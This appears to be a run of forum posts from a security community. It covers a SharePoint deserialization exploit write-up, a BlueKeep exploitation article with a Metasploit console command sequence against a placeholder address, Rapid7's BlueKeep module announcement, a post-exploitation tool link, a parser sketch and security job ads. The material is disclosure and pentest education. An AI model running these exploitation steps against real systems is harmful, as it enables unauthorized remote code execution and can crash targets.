This would be done to allow the caller flexibility to pass many different types of values for that parameter. The result is deserialization of an arbitrary XmlSerializer stream provided by the caller. The Exploit This vulnerability was tested on Microsoft SharePoint Server 2016 with KB4464594 installed. It was running on top of the 64-bit version of Windows Server 2016 update 14393.3025. In order to demonstrate exploitation, these steps are required: 1: An administrator must define a custom BDC model that includes a method with a parameter with type Microsoft.BusinessData.Runtime.DynamicType. For the custom BDC model, the Database Model example was used as a template and heavily reduced: 2: The administrator must then upload the BDC model via the SharePoint Central Administration | Application Management | Manage service applications | Business Data Connectivity Service. Alternatively, this can also be accomplished via PowerShell: 3: The attacker can then invoke the method, passing a payload in the parameter. On the SharePoint server, you will find that two instances of cmd.exe and one instance of win32calc.exe have been spawned, running as the identity of the SharePoint application pool. To see the path through the code, attach a debugger to w3wp.exe for the SharePoint application. Setting a break point at System.Web.dll!System.Web.UI.ObjectStateFormatter.Deserialize reveals the following call stack: Conclusion Successful exploitation of this won’t get you admin on the server, but it will allow an attacker to execute their code in the context of the SharePoint application pool and the SharePoint server farm account. According to Microsoft, they addressed this vulnerability in their September patch by correcting how SharePoint checks the source markup of application packages. Thanks again to Markus for this submission, and we hope to see more reports from him in the future. 
The September release also included a patch to fix a bug in Azure DevOps (ADO) and Team Foundation Server (TFS) that could allow an attacker to execute code on the server in the context of the TFS or ADO service account. We'll provide additional details of that bug in the near future. Until then, follow the team for the latest in exploit techniques and security patches. Source: https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization
  6. When I have time, I'll do some cleanup (no longer taking into account the seniority or usefulness of users who mock and swear). Even though it's not the best question, show some intelligence and offer an answer from which they can understand how things work.
  7. Bitdefender is proud to announce PwnThyBytes Capture The Flag – our competitive ethical hacking contest September 17, 2019 2 Min Read We hope you’ve all enjoyed your summer holidays, chilling out on the beach, seeing new places and recharging your batteries. Because this autumn we’ve prepared the first edition of PwnThyBytes CTF, a top-notch global computer security competition, which we hope will be a fun and challenging experience for everybody. The contest starts on September 28th and we’re hyped to give you a sneak peek at what to expect. Information security competitions, such as capture the flag (CTF) contests, have surged in popularity during the past decade. Think of them almost like e-sports for ethical hacking. In line with our mission to safeguard users’ data, we at Bitdefender host this event to bring together some of the most skilled teams around the world in areas such as Reverse Engineering, Binary Exploitation, Web Application Auditing, Computer Forensics Investigation, and Cryptography. We extend a warm invitation to everyone connected to or interested in computer security. Build up a team of friends or seasoned professionals, or even have at it by yourself if that’s your thing. Pit yourselves against the most seasoned security professionals on the CTF scene. Enjoy the experience of displaying your techniques, learning new skills, competing with kindred spirits, all for the chance of claiming the rewards and the glory that comes with them. Do you like delving deep into programs, websites, and anything related to computers? Do you like challenging yourself for the pleasure of improvement? Do you want to see just how good you are compared to the rest? If any of these questions strikes a nerve, click here to register. We look forward to seeing you showcase your skills! What do I need to know? 
Some skills/knowledge you'll need throughout the competition:
- Systems programming and OS internals (Linux, Windows), executable formats knowledge (ELF, PE)
- Reverse Engineering: anti-reverse techniques, anti-debugging techniques, packers, obfuscation, kernel modules
- Architectures: X86, X86_64, ARM, Web Assembly
- Vulnerability analysis and exploitation of binaries
- Web Application Auditing
- Computer Forensics Investigation: memory forensics, software defined radio, file system forensics
- Cryptography: symmetric, asymmetric, post-quantum schemes and general math skills
- Graph algorithms
What are the prizes?
- 1st place: 2,048 €
- 2nd place: 1,024 €
- 3rd place: 512 €
Source: https://labs.bitdefender.com/2019/09/bitdefender-is-proud-to-announce-pwnthybytes-capture-the-flag-our-competitive-ethical-hacking-contest/
  8. How to Exploit BlueKeep Vulnerability with Metasploit Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values), because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine:
- Background
- Prerequisites
- Installing the BlueKeep exploit module in Metasploit
- Preparing the target machine
- Adjusting the BlueKeep exploit
- Running the exploit module
- Conclusions
1. Background BlueKeep is a critical Remote Code Execution vulnerability in Microsoft's RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - submitted a pull request to the framework containing an exploit module for BlueKeep (CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it's still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is currently ranked as Manual, since the user needs to provide additional information about the target; otherwise it risks crashing it with a BSOD. Full article: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
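As a rough console sketch of the workflow the article walks through (the module path matches zerosum0x0's pull request; the IP address is a hypothetical placeholder, the target index must be chosen to match your exact OS/hypervisor combination, and the GROOMBASE/GROOMSIZE values are edited in the module's source beforehand, as described above):

```
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.56.101
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
```

Getting the kernel memory layout wrong here does not just fail silently: as the authors note, it bluescreens the target, so the values are worth double-checking before running this against anything you care about.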
  9. Yes, it's not exactly reliable, it's open-source. There are probably much more stable versions, though I don't think any of them is 100%.
  10. NetRipper is a post-exploitation tool targeting Windows systems. It uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, and it can capture both plain-text traffic and encrypted traffic before encryption / after decryption. https://github.com/NytroRST/NetRipper
  11. I did something like this for Shellcode Compiler, but I don't know whether my method is the most suitable one. In principle you should use some tokens (e.g. special characters) and decide what to do based on them. I'm not good at explaining how it works, but you can find tutorials about this, and even implementations of (basic) C compilers and probably of other languages too. What I did was define a "state machine". My idea is simple: I am in state "x" (for example the neutral state, in which I wait for something useful, like a function declaration or a function call). Then I read character by character, acting according to my current state. In my language you can define a function using "function function_name(parameters)", and I read only alphanumeric characters up to the first different character. If the word is "function", the user wants to declare a function, and I switch to the state that reads a function declaration. If it's something else, I expect a function call and switch to that state. For a function declaration I then expect a space (or several spaces, or tabs, depending on how permissive you want to be). If there isn't one: boom, error. If there is, I switch to the state that reads the function name (alphanumeric) until the "(" character is found, which indicates that the parameters follow. And so on... I don't know which solution is better; mine seemed simple to me, but it may not be the best or the most practical one. If you want to use it, take a pen and paper and draw the state machine: how you want it to look and through which characters it reaches which other states. PS: When transitioning between states you have to save some data, such as a function's name.
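The state-machine approach described above can be sketched in a few lines. This is a hypothetical illustration only (the state names, error messages and permissiveness rules are mine, not the actual Shellcode Compiler code), covering just the declaration path:

```python
# Hypothetical sketch of the state machine described above; state names and
# error handling are illustrative, not the actual Shellcode Compiler code.
NEUTRAL, AFTER_KEYWORD, FUNC_NAME = range(3)

def scan_declaration(source):
    """Read 'function <name>(' character by character; return <name>."""
    state, word, name = NEUTRAL, "", ""
    for ch in source:
        if state == NEUTRAL:
            if ch.isalnum():
                word += ch                 # accumulate the first keyword
            elif ch.isspace():
                if not word:
                    continue               # skip leading whitespace
                if word != "function":     # a call would switch to another state
                    raise SyntaxError("this sketch only handles declarations")
                state, word = AFTER_KEYWORD, ""
            else:
                raise SyntaxError("unexpected character: %r" % ch)
        elif state == AFTER_KEYWORD:
            if ch.isspace():
                continue                   # be permissive: extra spaces/tabs
            if not (ch.isalnum() or ch == "_"):
                raise SyntaxError("expected a function name")
            state, name = FUNC_NAME, ch
        elif state == FUNC_NAME:
            if ch.isalnum() or ch == "_":
                name += ch                 # saved data: the function's name
            elif ch == "(":
                return name                # '(' means the parameters follow
            else:
                raise SyntaxError("expected '('")
    raise SyntaxError("unexpected end of input")

print(scan_declaration("function  my_func(a, b)"))  # my_func
```

Note how the "data you have to save between states" from the PS shows up here as the `word` and `name` variables carried across transitions.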
  12. Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) by Brent Cook Sep 06, 2019 Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation. As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk. Exploitation notes By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. 
Server versions of Windows also require a non-default configuration for successful exploitation - namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future. One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, @rickoates, @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0's original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here! Detection and solution notes Defenders may want to note that BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner at the network level. If your network IDS/IPS is already able to detect the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode loads a child process to the Windows process spoolsv.exe by default, which is a similar indicator of compromise to exploits such as EternalBlue (MS17-010). 
All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch. While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities. The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability. Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. 
The chart above looks similar to the Labs team's previous report on RDP, and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes. For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7's previous analysis here. About Metasploit and Rapid7 Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com. Source: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true
  13. If anyone is interested in the bug bounty program (private), send me a PM.
  14. Yes, one useful thing to know is that if you want to earn more, you have to change the company you work for every now and then.
  15. Well, if you put it that way: I've heard there are only about 3 people in Romania who know some language used by a few huge companies (the language is extremely old, which is why nobody else knows it). These people all know each other and have huge salaries. But if a company moves to something newer, what job does one of those people find afterwards? So the real question is this: if you learn X, can you find a job in Romania? I haven't seen many positions for "R", "Scala" or "Elixir" (whatever that is). I've worked with several (large) companies in Romania that developed in Java and were continuously looking for people (fine, I admit: seniors). And of course, they paid very well. You can run a simple test: 387 Java jobs, 124 PHP jobs, 281 JavaScript jobs, 26 Swift jobs, 40 Ruby jobs... just from a simple search on BestJobs.
  16. If you want to run a business, it's obviously very good to be technically excellent, but it's not enough. To find clients you need a few things: connections if possible, sales skills, marketing, PR...
  17. As far as I know, Java is the most in-demand and best paid. I don't know about JavaScript, but PHP is, I believe, somewhat below Java. The point is that the big companies, the corporations, want custom, fast and stable software, and they use Java with frameworks like Spring (Boot) and Hibernate. And there seem to be more companies approaching things this way than with PHP. PS: It's just my opinion, don't take it as a certainty.
  18. That is the "Vulnerability Disclosure Program"; it isn't paid, but it offers HackerOne reputation. The bug bounty is currently private (invite-only). I think so, at least (I'm not the one handling it).
  19. I'll send you a PM.
  20. As for benefits, the company offers everything you could wish for. As for the position, it would be best if the person were a senior and able to handle a project on their own. There are many web applications, which I think is the most important part, but also many other things. PS: We also have a bug bounty if anyone is interested. Whoever wants to know more, send me a PM. Or see us at Defcamp.
  21. Thanks! I don't think much has changed, I think things are about the same. Yes, we'll be at Defcamp this year too. @BiosHell - Unfortunately not; we need experienced people who can take a project and handle it on their own.
  22. I don't know about this particular version, but in the past there have been such infected keygens for Burp. I recommend paying the 300 EUR for the application, because it's worth it.
  23. Yes, for a few months now.
  24. Accelerate Human Achievement: that is UiPath's purpose. We are the leader in Robotic Process Automation (RPA) and the highest-valued AI enterprise software company in the world. With over $568 million in funding from top venture capital firms like Accel, CapitalG, Kleiner Perkins, Sequoia, IVP, Madrona Venture Group, Meritech Capital & Coatue, we are on an unprecedented trajectory of growth. With this funding, we have an incredible opportunity to improve the way people work globally. Our award-winning company culture values humility, and leaders who know how to listen. CEO Daniel Dines’ primary goal was to build a company where he would love to work, and even now, with thousands of employees in tens of countries, that remains our top priority. We trust and empower our colleagues, and together we make sure we have everything we need to do our best work, from the support of strong leaders to awesome perks and benefits. UiPath is looking for a Penetration Tester to help and grow the security-related operations within the fast-growing product teams across the company. This is a deeply technical role that involves developing and applying formal security-centric assessments against existing and in-development UiPath products and features. The Pen Tester will analyze product functional and security requirements and use state-of-the-art testing tools, or develop/automate new tools as needed, to assess the security level provided. The role also includes assisting in investigating security incidents. The Penetration Tester will work with Security Engineers, together with stakeholders, and is responsible for detailing and executing the testing plans and strategies, while also building clear and concise final reports. A successful Penetration Tester at UiPath is a self-starter with strong analytical and problem-solving skills. The ability to maneuver in a fast-paced environment is critical, as is handling ambiguity, coupled with a deep understanding of various security threats. 
As a true owner of security at UiPath, great writing skills are needed, coupled with the ability to interact with stakeholders across multiple departments and teams. The Senior Penetration Tester acts as a mentor for technical peers and can translate testing strategies and results into high-level, non-technical language.
Here's What You Would Be Doing At UiPath
- Penetration testing & vulnerability research
- Developing automated security research tools
- Assisting internal and external customers in investigating security incidents
- Recommending threat mitigations
- Security training and outreach to internal development teams
- Security guidance documentation
- Security tool development
- Security metrics delivery and improvements
- Assistance with recruiting activities
What You Will Bring
- BS in Computer Science or related field, or equivalent work experience
- Minimum of 5 years of experience with vulnerability testing and auditing techniques
- Minimum of 3 years of experience in coding/scripting (Python, C, C++, x86/x64 assembly language)
- Good understanding of cyber-attack tools and techniques
- Experience writing PoCs for discovered vulnerabilities
- Good knowledge of system and network security
- Advanced knowledge and understanding of security engineering, authentication and security protocols, cryptography, and application security
- Experience using various penetration testing tools (such as Burp Suite, Metasploit, Nessus, etc.)
- Experience using debuggers and disassemblers for reverse engineering (IDA)
- Experience with forensics (preferably related to APTs)
We offer the possibility to work from home and flexible working hours; a competitive salary package, a Stock Options Plan and the unique opportunity of working with us to develop state-of-the-art robotics technology are just a few of the pluses. We must have caught your attention if you've read so far, so we should talk. At UiPath, we value a range of diverse backgrounds, experiences and ideas. 
We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes.
Seniority Level: Mid-Senior level
Industry: Information Technology & Services; Computer Software; Internet
Employment Type: Full-time
LinkedIn: https://www.linkedin.com/jobs/view/1405924525/
If anyone is interested, send me a PM.
  25. Accelerate Human Achievement: that is UiPath's purpose. We are the leader in Robotic Process Automation (RPA) and the highest-valued AI enterprise software company in the world. With over $568 million in funding from top venture capital firms like Accel, CapitalG, Kleiner Perkins, Sequoia, IVP, Madrona Venture Group, Meritech Capital & Coatue, we are on an unprecedented trajectory of growth. With this funding, we have an incredible opportunity to improve the way people work globally. Our award-winning company culture values humility, and leaders who know how to listen. CEO Daniel Dines’ primary goal was to build a company where he would love to work, and even now, with thousands of employees in tens of countries, that remains our top priority. We trust and empower our colleagues, and together we make sure we have everything we need to do our best work, from the support of strong leaders to awesome perks and benefits. Come join us security team as an integral part of UiPath's product team. Collaborate with product managers, developers and legal department to understand UiPath’s external and internal security and privacy compliance requirements. 
Here's What You Would Be Doing At UiPath
Bring your security monitoring experience to UiPath:
- Build a security monitoring strategy and plan for UiPath-hosted online services
- Collaborate with security engineers and penetration testers and incorporate their feedback into specific requirements for monitoring against advanced threats
- Identify opportunities to build scripts and tools that enable deeper insight into the security state of our online servers
- Based on our services' components and architecture, define and build meaningful sources of security alerts that provide useful insight into the security and compliance posture of UiPath's online environment
- Collaborate with development and IT teams in setting up and configuring the tools and systems needed to implement your monitoring strategy and plan
- Continuously enhance your monitoring strategy by staying on top of: changes in infrastructure and services running in the UiPath online environment; innovation in tools provided by cloud service providers to detect and control threats; and threat intelligence in the industry to identify potential threats applicable to the UiPath online environment
Bring your incident management experience to UiPath:
- Analyze security alerts and turn them into actionable follow-up items through collaborative investigation and triage with development and IT teams
- Define an incident response process and a playbook for stakeholders in development, IT and SRE teams
- Integrate the security incident response process with existing tools for incident response in the company
- Build effective and actionable reports for development staff and management stakeholders
What You Will Bring
- Proven track record (10+ years of experience) in the security monitoring space, delivering meaningful results for a high-volume, high-complexity SaaS business
- Strong understanding and evidence of hands-on knowledge and experience in the following areas of security monitoring and incident response:
Security Monitoring
- Web application layer attacks and firewalls
- Denial of service attacks and cloud service providers' native protections
- User and network level access control violations
- Phishing attacks
- File integrity monitoring
- Security configuration drift
- Security patch management
- Critical workload process monitoring
- User and system account compromise
Incident Response
- Pre-breach incident management tabletops and drills
- Post-breach incident management playbooks
- Stellar teamwork and collaboration skills; proven track record of effectively working with remote teams
- Proven ability to wear multiple hats, prioritize, not get stuck, and adapt in an environment that's growing and changing fast
- Prior experience with Azure Security Monitoring
- Prior experience with an incident management toolset
You'd be part of the strongest security and compliance management team in the world - we only hire the top 1% of the top 1%. Why work with us? We offer the possibility to work from home and flexible working hours; a competitive salary package, a Stock Options Plan and the unique opportunity of working with us to develop state-of-the-art robotics technology are just a few of the pluses. We must have caught your attention if you've read so far, so we should talk. At UiPath, we value a range of diverse backgrounds, experiences and ideas. We pride ourselves on our diversity and inclusive workplace that provides equal opportunities to all persons regardless of race, color, religion, sex, sexual orientation, gender identity and expression, national origin, disability, military and/or veteran status, or any other protected classes. 
Seniority Level: Mid-Senior level
Industry: Information Technology & Services; Computer Software; Internet
Employment Type: Full-time
LinkedIn: https://www.linkedin.com/jobs/view/1405925374/
If anyone is interested, send me a PM.